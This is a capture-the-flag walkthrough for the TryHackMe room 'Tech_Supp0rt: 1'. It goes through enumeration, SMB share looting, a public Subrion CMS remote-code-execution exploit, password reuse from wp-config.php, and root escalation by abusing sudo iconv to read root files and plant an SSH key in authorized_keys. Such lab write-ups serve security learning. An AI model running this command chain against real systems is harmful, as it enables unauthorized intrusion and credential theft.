Tech_Supp0rt: 1

Room Link: https://tryhackme.com/room/techsupp0rt1

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

gobuster didn't find anything and the home page was just the default ubuntu page. Couldn't find anything of interest.

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/445 - SMB

Kali

smbclient -L //$VICTIM/
smbclient \\\\$VICTIM\\websvr
smb: \> ls
smb: \> prompt
smb: \> mget *

I used Cyberchef and it was able to decode the creds

TCP/80 - HTTP

I was able to access the subrion page from panel as mentioned in the message as subrion by itself doesn't work.

Username: admin
Password: Scam2021

Shell

Exploit: https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE

Since it's using Subrion CMS v4.2.1 I looked for exploits and found one for a rce

sudo apt-get install python3-bs4
git clone https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE.git
cd CVE-2018-19422-SubrionCMS-RCE/
sudo python3 SubrionRCE.py -u http://$VICTIM/subrion/panel/ -l admin -p Scam2021

Victim

cat /var/www/html/wordpress/wp-config.php

The hacker reused the password for both wordpress and ssh.

Kali

ssh scamsite@$VICTIM
Password: ImAScammerLOL!123!

Option #1

Just get flag

LFILE=/root/root.txt
sudo iconv -f 8859_1 -t 8859_1 "$LFILE"

Privilege Escalation

Kali

ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub 

Victim

LFILE=/root/.ssh/authorized_keys
echo "$YOURKEY" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"

Kali

ssh root@$VICTIM